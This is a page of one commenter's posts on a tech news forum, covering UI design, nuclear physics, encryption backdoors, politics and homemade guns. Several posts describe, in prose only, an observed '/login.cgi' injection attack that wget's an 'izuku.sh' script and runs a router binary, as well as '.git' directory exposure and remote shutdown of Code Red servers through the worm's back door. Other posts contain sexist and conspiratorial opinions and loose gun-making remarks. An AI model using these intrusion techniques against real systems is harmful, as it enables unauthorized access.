Re: UI revamp
ugh, the WORST fat-finger-burger menu EVAR! [I am nauseated just thinking about it]
5200 posts • joined 1 May 2015
I've heard that term for years, often used in engineering circles to avoid more profane terms that mean the same thing. It deserves an actual technical definition, like 'CRUD'.
In the nuclear industry, CRUD is officially "Corrosion and wear byproducts in a nuclear reactor system that have become radioactive and are deposited and accumulated in related equipment". 'CRUD traps' are places where it accumulates the most, and they often get signs posted on them indicating the last measured radiation dosage rate. Some are so bad they get lead shielding wrapped around them so that you can spend more than 5 minutes nearby when working on stuff, without exceeding your radiation limits at any rate. But yeah it's the side effect of neutron-irradiating Iron 59 which turns it into Cobalt 60. CRUD.
I suppose CRUFT could officially become "any bloatware or overly implemented feature that can easily be eliminated without adversely affecting the usability or functionality of a software application."
"There's someone in MS who knew very well what they were inflicting on the general public with the ribbon but they did it anyway."
That person no longer works at Micro-shaft. Maybe this is why it's starting to get a face lift? Same person responsible for ribbon AND "the metro" in case anyone wondered (see link), even though Sinofsky (allegedly) had taken the fall over 'the metro' and Windows 'Ape'.
Then again, "fixing" the ribbon (instead of completely obliterating it) is lipstick on a boar, but this time it IS on the oinky end.
unfortunately it seems nothing's been done about the 'izuku.sh' file, though my logs show different IP addresses hosting it now. Yeah, they ignored me. Well that server _IS_ in Poland... they probably can't read or understand the information properly and/or just ignore it because they regularly host criminal services or similar. [I've had 'confirmed kills' before, wtih responses, just not that often - usually it is silently fixed or seems so because the activity stops]. Another possibility is that they leave it on the server to see what IP addresses download it to track the thing. Well I won't interfere with law enforcement if that's the case.
( I also posted the actual URL on USENET, and described it even better there, so not like it's invisible any more, and anyone can see it in web server logs )
Back at the turn o' the century, Code Red lingered for several years after the initial infections started. Someone (allegedly me perhaps?) allegedly had an auto-responder that would allegedly shut down the Code Red infected web server remotely (since it was attempting to spread a virus) via the Code Red back door command/control channel and (allegedly) leave a file on the administrator desktop that said something like "you are an idiot" and explained why the web server was shut down remotely. Both of those factoids should frighten any clueless admin into patching the thing (as it was most likely some old unpatched "oh we have a web server running?" Win2k box in a closet that nobody thought about. But I digress...
Since June there have been a number of requests for '/login.cgi' in my web logs (several hundred) with an obvious code injection exploit in the URL, that wget's a file on a server with a specific IP address (several of these observed, looks like they change periodically) which then loads a binary image for MIPS or ARM processors [as appropriate] into /tmp or one of several other directories that it might be able to download something into...
in any case the script it first downloads is called 'izuku.sh' . I reported my logs and findings to several ISPs who either hosted the machines doing the request, or WERE the host for the downloading.
Not sure if this is the same one the article talks about, but the one I saw has been around since June (according to my logs) and always tries to download that script file which then attempts to download the binary into one of several directories, then load/run it. And I think if you disable remote management on your router, this (apparent) virus won't infect it. But it could be a different one, not the one the article is about. I don/t know. So I mention it anyway, just in case. Details are sometimes useful...
Anyway, if you have a web server, look for access attempts for /login.cgi and you'll probably see it (the one I'm talking about). Again, dunno if it's the same as the one in the article, but is similar, probably.
(the first log entry is 15-June at 14:36, in case anybody wonders)
Let's say you do testing, and you discover a leak. you know it's "around here". The drawings say there shouldn't be a leak, but you have one anyway. So, to access the leaky zone, you drill a hole. THEN you inject some sealant goop into the hole, and the leak stops. YAY, you FIXED it! But it doesn't hold, and so now your hole is in a photograph blaming you.
less funny than the other explanations. I'll get my coat anyway for the buzz-kill effect.
A sub with a hole 'above the water line' so it's ok... uh, huh.
well I don't think sub builders [in this case, probably Electric Boat, or perhaps Mare Island] would be so brain-dead stupid as to actually do that. My guess is it's just a funny urban legend... or it may have been a hole that was drilled for some other reason (to attach sonar gear via a cable that penetrates the hull?), and someone was funnin' with the civilian. [yeah maybe the cable stuffing box hadn't been attached yet]
In reality sub hulls are thoroughly x-rayed and re-welded if any flaws are found. I was semi-involved in that process once, a long time ago. Standard practice for Navy ships at any rate.
And yeah, subscription pricing is next, right? (if I read the tail-end of the article correctly, it is)
Somehow I think a good old-fashioned "git pull", local edit, and "git push" would do better. There's already an editor of sorts for merging, and I'm not amused by it. It's kinda "piggy" and not impressive in the least.
But I suppose it *could* get worse.
/me thinks: just because you CAN does not mean you SHOULD.
the cloud would work better if Micro-shaft could write EFFICIENT CODE like they USED to.
Compare ".Net" and "UWP" to how snappy Win '95 was, by comparison. In 16Mb of memory even!!!
And that pretty much explains it all. Micro-shaft, STOP it with the BLOATWARE! Abandon ".Not", "UWP", "The Metro", C-pound, and THE SPYWARE!!! [then you might find your servers won't overheat because they're no longer working against themselves, ya know???]
MS fanboi downvotes welcome. heh. But, you *KNOW* I'm *RIGHT* about this!!!
using a git repo for web-side code that [at one time] had keys or other information embedded in it [think something similar to DJango 'template' files, where server-side code could be embedded in the actual pages themselves, or more specifically what .git has in it] could, in a misconfigured system, reveal the '.git' directory and allow it to be downloaded. And if you don't have the keys embedded it it NOW, maybe they were there 'for testing' in any version of the code EVAR, and that's the security hole [in this case].
I am pretty sure DJango's default implementation doesn't allow access to '.git' directories. However, if you bring it up in 'debug' mode, or allow 'generic' file downloading on ANYTHING, it just might...
[there are many reasons I dislike DJango, easy to misconfigure due to its overall confusing nature being one of them]
Some additional experiments (by me) showed that default apache will serve up those '.git' directories unless you tell it NOT to. I created one for grins (as a symlink) and re-directed it to "the usual place" along with all of those other things that crackers and web viruses always want to test downloading. And after checking some web logs, I discovered that there's another bit of virus/malware out there looking for '/login.cgi' and apparently attempting to inject a wget command to download something from a rogue server at an IP address that I shouldn't mention here. If you want that IP address, check your web logs. It's probably there. It's also pretty recent.
Just to add a little physics here...
The problem I see with eddy currents 'kick starting' a reaction in the white dwarf is that the sudden addition of reactivity [i.e. the gravitational compression] is *ALSO* likely to cause an uncontrolled reaction and *EXPLOSION* rather than a 'kick start' of the star.
Fusion and fission share a few similar *kinds* of parameters, reactivity being one of them. In the case of fusion, a major part of the reactivity consists of heat and density. The fusion reaction in a star is stable because the expansion force from the fusion reaction is balanced by gravity. Too much of one, the star goes 'boom', or collapses onto itself and goes out.
I would expect that because one fusion leads to another, you'd have a lifecycle time, delaying effects, and 'reactivity' (related to the effective neutron multiplication factor for fission; for fusion, it would be related to the ability of the energy from one fusion reaction to trigger others). When you have a sudden increase in reactivity, it's likely in a fusion reaction (as it is in a fission reaction) that you get a sudden 'jump' in the reaction rate that's somewhat proportional to the reactivity addition rate (this would be due to various factors that would be common in the reactivity equations of both fusion and fission). When the power levels of a nuclear reactor are unstable [a lot of chaotic activity, like a shut down fission reactor or a 'brown dwarf' star] then sudden spikes in the reaction rate might trigger an unknowable "super power level surge", high enough to explode instead of 'just starting up'. Or not.
The SL-1 incident (see https://en.wikipedia.org/wiki/SL-1 ) was a case where a shut down fission reactor went 'prompt critical' due to sudden reactivity addition, and experienced a 'prompt jump' in power levels (followed by 'prompt criticality' where power multiplied in microseconds instead of 100's of milliseconds) from a shut down condition to a 'thousands times maximum' power level (20GW according to the article, in a 3MW reactor) in a few milliseconds, burned nearly ALL of the nuclear fuel in that time period, and caused a 'water hammer' when all of the cooling water covering the core suddenly flashed to steam and pushed the remaining water up like a big piston, faster than you can blink, forcing the reactor vessel and attached components to jump 9 feet into the air, etc. etc. very very bad contamination, core meltdown, dead people, yotta yotta. Yuck. Photo of what was left of the the melted/sploded core on the web page.
Assuming that sudden dwarf star restarts might act *like* *that*, because of the addition of reactivity by tidal forces and other 'black hole' things, if it's too quick, dwarf star go *BOOM*. My opinion.
"I making a point of immediately binning any CVs submitted as a .odt file"
That's why smart people submit PDFs instead, to get past the H.R. weenies and middle managers who think 'that way'.
Besides, who'd *WANT* to work for a snooty anal-retentive person that throws out a resumé simply because it's in an open source format? Or, worse, a company that HIRES such people in the H.R. department? [H.R. is the worst part of working on-site for any medium to large company - it's like they live to justify their own existence or something, nearly as bad as OUTSOURCED H.R.]
Fortunately, at this time, it's a "seller's market" (edit, I'd said 'buyer' but it's really 'seller') for employment opportunities, at least in the USA. It's pretty 'great'. [yeah I _did_ mean that, actually] So go ahead and toss my resumé so I don't hear back from ya!
FYI - 'goto' is a legitimate way to program although it should be used (mostly) for things *like* error cleanup [see lots of Linux kernel modules for examples - 'error_exit' and similar labels].
In the world of userland-only coding, you can afford to be snobby about 'never use goto'. In the kernel world, you use it because it works better. Just pointing that one out, for those who don't know.
"After all few Windows-only Software actually uses anything that came out after 2000."
I wish this were true. Unfortunately, some *EXTREMELY* unwise software developers (for business applications) drank the Micro-shaft coolaid and either use C-pound, or (nearly as bad) ".Not" with C++.
If the application you use falls into this category, you're *B0NED*.
However, if the developers were SMART, they used Java [Oracle does this] or MFC/C++ *without* ".Not" and targeted XP or 7 [and not 10]. Yes, it's STILL possible to do that. And very, very wise.
/me points out that with a little effort, MFC applications can be modified to use wxWidgets to run on Mac or X11 systems. There's effort for sure, but it's not "that much" and worth doing. Then you can have a single code base for everything. Yes, _I_ do this.
Once business applications are commonly available for Linux and Mac, people will *STOP* "needing" Windows, and developers will have even MORE reason to make their applications run on non-windows OSs.
"and even though I have complete confidence in my own ability to get it right, I also know how much of my time it would take to be certain that I got it right"
blah blah blah - sorry, I don't accept the *kinds* of statements that I would consider *toxic*. They are similar to:
"other, smarter people" "it's too difficult" "other people have tried and failed" "it will never work" "you don't have the skill set" "re-inventing the wheel" "wasting your time" "use what already exists" "it's been done before" "it's never been done before" ... on, and on, and on, the negativity, so negative!
How about something encouraging like: "Well, when it comes time to check your algorithm, make sure that [short description of mathematical algorithm or procedural test] does [whatever result you should get for good encryption]
Otherwise, it sounds like the usual negativity ninnies. Just sayin.
[and I'd be interested in what tests you WOULD recommend]
icon, because, I hear from negativity ninnies all of the time. It's irritating at the least. Why discourage those with enthusiasm? Instead, point them in a direction that's actually HELPFUL.
"good crypto is incredibly hard to do"
I wouldn't say 'incredibly hard', but the diligence of testing the algorithm for actual cryptographic strength would be a part of that, yeah.
I wrote an encryption algorithm a couple o' decades ago. It was in protest of the 128-bit vs 60-bit "exportable" encryption nonsense, which was finally overturned a year or so later.
I described it in prose on a web site (kinda like PGP) just to make a point. It used a 256-bit key and a CRC algorithm at its core with a moving window that involved the encrypted data, not the 'dry' data, and was hyper-efficient on encrypting very large data files. Downside, required building a 128kbyte translation table which took a second or two on those old machines. I also encrypted the source file and published the binary, DARING anyone to de-crypt it. I used to get a lot of hits on that page, too (a hundred or so a month) and no takers on decrypting the source file. I forget what key I used to encrypt it. heh.
Turing is a VERY interesting example of what gummints could (and maybe WILL) do once the "need" for an individual has passed. Turing was needed to win the war. Turing was also on someone's "undesirable" list. He wasn't hurting anyone, but for some reason he NOW 'lost favor' and was quite effectively mistreated.
It is an example of "politics of the day" and those who do not conform to it, at the whim of those who wield power without accountability. Turing was a homosexual, and for some reason in the 1950's that suddenly became a problem (when it apparently wasn't in the 1940's because we needed him to decode Enigma and other coded messages). Turing should've gotten more respect. I have to wonder whose corn flakes he urinated in to suddenly cause "that" to happen...
The entire concept of free speech is really about POLITICAL speech, particularly speech that 'those in power' don't want to hear. "Political Correctness" fascists seek to SILENCE those they don't agree with, including corporations like Google and Facebook, as evidenced by how 'Diamond and Silk' have been treated (among other things).
And if you're law enforcement, and you look at someone's life for long enough, silently decrypting their files and data traffic and online history and so forth, until you find something 'questionable', you WILL find it eventually, ESPECIALLY when you have the unlimited resources of the U.S. Federal government and a _WILLING_ Department of "Justice" helping 'them' along and covering up the "2-tier'd justice system" abuses. You know, one justice for THEM, and another for YOU. That's a 2-tier'd justice system.
We do NOT need back doors to our encrypted data, giving unscrupulous power abusing law enforcement and government spies the keys to our lives. It's too easy to abuse in a digital world, which is why people use the encryption in the FIRST place. It's not so much what they WILL do, more like what they COULD do, or THREATEN to do to you, leaving you always looking over your shoulder, justifiably paranoid, of being somehow caught in a 'Perjury Trap' by the F.B.I. when you thought you were telling the TRUTH...
And WHO wants to live like _THAT_ ??? I'd rather be *FREE*.
A mandatory back door to encryption just opens wide for fishing expeditions and criminals who somehow get the key.
Yeah, THAT never happens [recent news stories regarding _serious_ FBI corruption at the highest levels and a 2-tier'd justice system notwithstanding, right?]
If "they" want to "find something" on you, and have a crypto back door AND unlimited funds and resources, they WILL find something. It can be ANYTHING, including a "process crime" for you "lying" to them. "I wasn't doing a self-pleasuring sex act to online pr0n!" "we have your webcam photographing you doing this with a time stamp and XXX minutes of video, courtesy of your encrypted file system with a back door". And so on. You lie to them about it, it violates the law 'making a false statement to a federal officer', and they JAIL YOU for it, or force you to plead "guilty" to some B.S. made-up "crime" instead...
because they CAN, and you happen to be on "their" radar. And they have the back door encryption keys, and they can fish for "illegal" activity whenever they please.
Yes. Reasons _NOT_ to allow this crap. Clear substantiated proven and undeniable evidence for this kind of abuse from top members of the DOJ in the U.S., and the methods they use to HARASS people into a conviction, is on the news, every night. No, not THAT news, the OTHER news...
ack on noscript, and also plugins that make all un-white-listed cookies temporary.
But... when will they FIX THE AUSTRALIS NONSENSE and GO BACK TO THE WAY IT WAS? you know, a UI with a MENU (and not a fat-finger-burger-button) at least by default, 3D SKEUOMORPHIC [like it USED to be, not all "chrome clone" looking] and WITHOUT the skinny black font and bright blue 2D "buttons" on a blisteringly white backgroun 'options' screens...
'penny wise, pound foolish' I say.
paying extra to use a privacy service for the whois is pretty common, and a good idea if you personally register a domain. you don't want your home address and real name attached, right?
And so nothing really changed except that, with GDPR, it's theoretically possible to get the same level of service FOR FREE.
Let's do that in the USA too! I like it already.
In theory a registrar would need to have the real name/address and so they would know who to serve paperwork on for any kind of legal action.
That being said, ICANN could require registrars to cooperate with 'due process'. Fixed.
[it's probably like this already for the privacy services]
In the USA, you could do something _like_ an 'order to locate' in which you submit paperwork to a judge, in an 'ex parte' hearing (meaning you walk on in between cases) who then reviews the request and then signs or rejects it, most likely signing it if the case it applies to has any kind of merit. Then you serve paperwork after locating the entity/individual, sometimes involving law enforcement in the service, etc..
The registrar would simply have to honor the judge's order. But it's an extra step, probably doesn't really cost anything more than attorney fees for paperwork, and that will be significant enough for any legal action, so it's like *meh*.
IANAL disclaimer, YMMV, etc.
"It is funny how all of these supposedly creative people all come up with a look and feel for sites that is almost identical."
almost identically *CRAP* design, all 2D FLAT and BRIGHT BLUE ON BLINDING WHITE.
It's like who told these guys THAT was 'good design'? Like who told cashiers to put the coins ON TOP OF THE DOLLAR BILLS and then hand the pile to you... some dim-bulb pretending to be a consultant I guess. And that answers the OTHER question, too.
more likely, three colors.(at least for the actual web page, transcribed from a white board maybe)
One is light blue, for everything that's supposed to look like a button or a symbolic link.
Next, there is blisteringly blindingly bright white, for 90% of the page, to keep you from being able to see anything on it [like staring directly into the sun].
Then there's the black text, with a font size that is too small and a font weight that's too thin to be easily read without magnification, by anyone over the age of 35. Like this edit box, right here. Hint hint hint. Now, where's my magnifying glass... everything looks like "blur" on bright white here.
"Put some CSS, JQuery, or Ajax in there maybe the page could be
Fixed it for ya. Except CSS is ok when kept to a minimum [and not some ginormous boilerplate abomination from robot hell, stored on a CDN, and only used on THAT web page].
I can imagine how many horrible things gone horribly wrong will end up on 'teh intarwebs' as a result of an AI tool that turns drawings into web pages.
one step further, hard-to-guess user names that don't match e-mail names. It's an additional step that can prevent cracking your system, if the user names are also hard to guess.
'Jimmy1973' is too obvious. How about 'JMR.cor.bat.hor.sta' [a mild reference to "that comic" that I haven't seen mentioned yet, something about a horse saying "correct, that is a battery staple"]
and a few lines from the movie 'Hackers'... (from themoviequotes.com)
Eugene Belford: Someone didn't bother reading my carefully prepared memo on commonly-used passwords. Now, then, as I so meticulously pointed out, the four most-used passwords are: love, sex, secret, and...
Margo: [glares at The Plague]
Eugene Belford: god. So, would your holiness care to change her password?
wives from abroad... in some ways, as an American Male, this makes sense.
There is at least one web site out there dedicated to "no marriage" - without actually linking to it, which might force me to complete a captcha [difficult with scripting turned off].
In summary web sites like these contrast 'american feminist women' with women from outside of the US, suggesting that un-Americanized women make better wives. [there's a lot of truth to that; radical feminism has DESTROYED women, in my opinion, often turning them into queen-B man-hating B.I.itches, and who'd want to be married to one of THOSE women, but I digress...]
then why not BECOME "the rich CEO" yourself? [you lack the talent and drive and risk taking to do it? not MY problem! nor the problem of the CEOs that become "rich"]
Seriously, your particular argument sounds like it belongs at the last part of 'The Jungle'. [I had to read that for a class once - the last 1/3 of it is nothing but Communist propaganda from the 19th century]
Marx and Engels would be proud!
uh, the point of using plastic is to keep metal detectors from detecting it. [then again projectiles and casings are or have metal in them already, so it's just 'less detectable" with less metal in it]
so a metal printer would make "a firearm" and not "an undetectable firearm".
Since I can't think of an element or material that's both heavy AND solid enough to be a projectile, other than metals like lead or uranium, a plastic weapon that's totally undetectable is most likely going to be ineffective. You'd do better with a ceramic knife.
(pointing out that non-ferrous metal can be detected too, not just ferrous metal - put brass or other metal near a coil and its inductance changes, for example - eddy currents)
"You would expect the NRA to be screaming bloody murder, but they remain silent"
I think you misunderstand the NRA's position. It's mostly about the right to DEFEND YOURSELF using firearms. Plastic guns are more like 'skoff-law' weapons. The NRA wants you to be able to purchase, carry, and use a weapon that you legally purchase [one that is safe and won't explode when you try to use it].
It really has nothing to do with gun manufacturers, though it's likely that the gun manufacturers are members. But then again, in a capitalist society, someone will make money from selling things people want. I don't have a problem with that. Burdening the citizens' cost of ownership with excessive taxes, regulations, and 'ban-laws', I have a LOT of problems with THAT.
And yeah, it's reasonable to make it illegal [for a time, at least] for convicted felons to own/use firearms. Simply "being accused" should NEVER deprive you of your legally owned firearms, however.
(icon because an armed citizenry is difficult to manipulate and control - big brother is behind the bans)
selling drugs probably gets you jail time too. yet I bet it's easy to buy them, depending on where you go... (UK, USA, or anywhere for that matter)
[this is the classic libertarian 'making it illegal does not stop it' argument, yeah]
Don't forget the USA's experiment with prohibition. Not only did alcohol consumption continue, it became 'bad alcohol' consumption [home-made hooch with methanol and other poisons in it], and a great empowering of organized crime.
"I can download plans to make black powder rifles and pistols (I have made one of each).. I assume there's probably plans for semi-autos out there."
guns were invented about 1000 years or so ago in China, about the same time as gunpowder.
The Kentucky Long Rifle, one of the most accurate weapons in the mid 18th century, was hand-built by craftsmen without modern milling equipment. (wikipedia quotes someone as describing them being built with 'crude tools').
I think modern educated/trained engineers, machinists, and craftsmen are even smarter now [they won't have to go through as much trial/error to get some kind of success]. I see no obstacles to success here.
And you could simply hire a machinist to build certain parts for you, and make the rest of out plastic or wood or whatever in whatever design you like. "I want a hollow metal tube with a fracture toughness of XXX or more, capable of withstanding temperatures up to XXX, with several small grooves cut into the inside that slowly rotate their orientation from one end to the other." <-- rifled barrel
(and a firing pin isn't that big of a deal, really - yeah has to be strong so it doesn't bend, but still...)
Then you do experiments in a bunker-like enclosure to test the limits of your new rifle design, just like gun manufacturers would do. when you get a good one, mass produce!
So yeah who needs to rely on "illegally distributed" intarweb plans, when you can MAKE! YOUR! OWN! [with a little time in a regular old library studying up beforehand]
(pirate icon, because, obvious)
Biting the hand that feeds IT © 1998–2019